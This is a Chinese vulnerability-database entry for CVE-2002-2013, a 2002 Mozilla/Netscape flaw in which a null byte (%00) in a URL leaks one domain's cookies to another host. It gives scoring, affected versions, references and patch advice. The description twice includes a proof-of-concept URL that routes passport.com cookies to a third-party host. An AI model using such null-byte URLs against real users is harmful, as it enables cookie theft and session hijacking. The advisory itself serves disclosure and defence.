CVE-2002-2013
CVSS5.0
发布时间 :2002-12-31 00:00:00
修订时间 :2008-09-05 16:32:06
NMCO    

[原文]Mozilla 0.9.6 and earlier and Netscape 6.2 and earlier allows remote attackers to steal cookies from another domain via a link with a hex-encoded null character (%00) followed by the target domain.


[CNNVD]Netscape/Mozilla 空字符插入URL中窃取Cookies漏洞(CNNVD-200212-763)

        
        Mozilla是种公开发放、免费使用、开放源码的WEB浏览器,可运行于绝大多数Unix/Linux系统上,也可运行在MacOS和微软Windows 9x/ME/NT/2000/XP上。Netscape类似Mozilla,也是一种这样的WEB浏览器。
        Cookies常常被WEB站点用来验证用户身份,如果攻击者可以窃取某用户的cookies,就可以假扮该用户访问相应的WEB站点。Mozilla和Netscape都存在这样的安全漏洞。
        比如在受影响的浏览器中加载如下URL
        http://alive.znep.com%00www.passport.com/cgi-bin/cookies
        将导致".passport.com"这个域对应的cookies被发往"alive.znep.com"。注意,这个漏洞只能窃取某个域对应的cookies,无法窃取特定主机对应的cookies。
        为利用此漏洞不需要活动脚本的支持。
        

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: NONE [对系统可用性无影响]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:mozilla:mozilla:0.9.2Mozilla Mozilla Browser 0.9.2
cpe:/a:netscape:communicator:4.76Netscape Communicator 4.76
cpe:/a:netscape:navigator:6.2Netscape Netscape 6.2
cpe:/a:netscape:communicator:4.75Netscape Communicator 4.75
cpe:/a:netscape:communicator:4.08Netscape Communicator 4.08
cpe:/a:mozilla:mozilla:0.9.5Mozilla Mozilla Browser 0.9.5
cpe:/a:netscape:communicator:4.5Netscape Communicator 4.5
cpe:/a:netscape:communicator:4.4Netscape Communicator 4.4
cpe:/a:mozilla:mozilla:0.9.3Mozilla Mozilla Browser 0.9.3
cpe:/a:mozilla:mozilla:0.9.2.1Mozilla Mozilla Browser 0.9.2.1
cpe:/a:netscape:communicator:4.74Netscape Communicator 4.74
cpe:/a:mozilla:mozilla:0.9.6Mozilla Mozilla Browser 0.9.6
cpe:/a:netscape:navigator:6.1Netscape Netscape 6.1
cpe:/a:netscape:communicator:4.72Netscape Communicator 4.72
cpe:/a:netscape:communicator:4.51Netscape Communicator 4.51
cpe:/a:netscape:communicator:4.61Netscape Communicator 4.61
cpe:/a:netscape:communicator:4.5_betaNetscape Communicator 4.5 BETA
cpe:/a:mozilla:mozilla:0.9.4Mozilla Mozilla Browser 0.9.4
cpe:/a:mozilla:mozilla:0.9.4.1Mozilla Mozilla Browser 0.9.4.1
cpe:/a:netscape:communicator:4.6Netscape Communicator 4.6
cpe:/a:netscape:communicator:4.77Netscape Communicator 4.77
cpe:/a:netscape:navigator:4.77Netscape Netscape 4.77
cpe:/a:netscape:communicator:4.07Netscape Communicator 4.07
cpe:/a:netscape:communicator:4.73Netscape Communicator 4.73
cpe:/a:netscape:navigator:6.01Netscape Netscape 6.01
cpe:/a:netscape:communicator:4.78Netscape Communicator 4.78
cpe:/a:netscape:communicator:4.06Netscape Communicator 4.06
cpe:/a:netscape:navigator:6.0Netscape Netscape 6.0
cpe:/a:netscape:communicator:4.0Netscape Communicator 4.0
cpe:/a:netscape:communicator:4.7Netscape Communicator 4.7

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-2013
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-2013
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200212-763
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/3925
(PATCH)  BID  3925
http://www.iss.net/security_center/static/7973.php
(PATCH)  XF  mozilla-netscape-steal-cookies(7973)
http://archives.neohapsis.com/archives/bugtraq/2002-01/0270.html
(UNKNOWN)  BUGTRAQ  20020121 Mozilla Cookie Exploit
http://alive.znep.com/~marcs/security/mozillacookie/demo.html
(UNKNOWN)  MISC  http://alive.znep.com/~marcs/security/mozillacookie/demo.html

- 漏洞信息

Netscape/Mozilla 空字符插入URL中窃取Cookies漏洞
中危 输入验证
2002-12-31 00:00:00 2006-08-23 00:00:00
远程  
        
        Mozilla是种公开发放、免费使用、开放源码的WEB浏览器,可运行于绝大多数Unix/Linux系统上,也可运行在MacOS和微软Windows 9x/ME/NT/2000/XP上。Netscape类似Mozilla,也是一种这样的WEB浏览器。
        Cookies常常被WEB站点用来验证用户身份,如果攻击者可以窃取某用户的cookies,就可以假扮该用户访问相应的WEB站点。Mozilla和Netscape都存在这样的安全漏洞。
        比如在受影响的浏览器中加载如下URL
        http://alive.znep.com%00www.passport.com/cgi-bin/cookies
        将导致".passport.com"这个域对应的cookies被发往"alive.znep.com"。注意,这个漏洞只能窃取某个域对应的cookies,无法窃取特定主机对应的cookies。
        为利用此漏洞不需要活动脚本的支持。
        

- 公告与补丁

        临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        * 尽量不要让不可信任的人使用自己的计算机。
        厂商补丁:
        Mozilla
        -------
        目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
        Mozilla Upgrade Mozilla 0.9.7
        
        http://www.mozilla.org/releases/

        Netscape
        --------
        目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
        Netscape Upgrade Netscape 6.2.1
        
        http://home.netscape.com/download/index.html

- 漏洞信息

60248
Netscape URI Null Byte Cross-domain Cookie Disclosure
Remote / Network Access, Context Dependent Information Disclosure, Input Manipulation
Loss of Confidentiality
Exploit Public

- 漏洞描述

Unknown or Incomplete

- 时间线

2002-01-21 Unknow
Unknow Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站